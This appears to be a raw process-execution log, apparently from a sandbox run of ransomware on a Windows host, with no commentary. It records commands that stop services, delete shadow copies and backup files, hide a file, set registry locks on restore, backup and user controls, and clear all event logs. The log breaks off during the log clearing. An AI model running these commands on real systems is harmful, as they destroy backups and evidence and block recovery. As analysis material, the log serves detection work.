C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2000 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2104 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\system32\sc.exe

sc config SQLWriter start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\system32\sc.exe

sc config SstpSvc start= disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1088,1546424319097688224,17197977033559286174,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\system32\wevtutil.exe

wevtutil.exe el

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Media Center"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppID/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Backup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"

C:\Windows\system32\wevtutil.exe

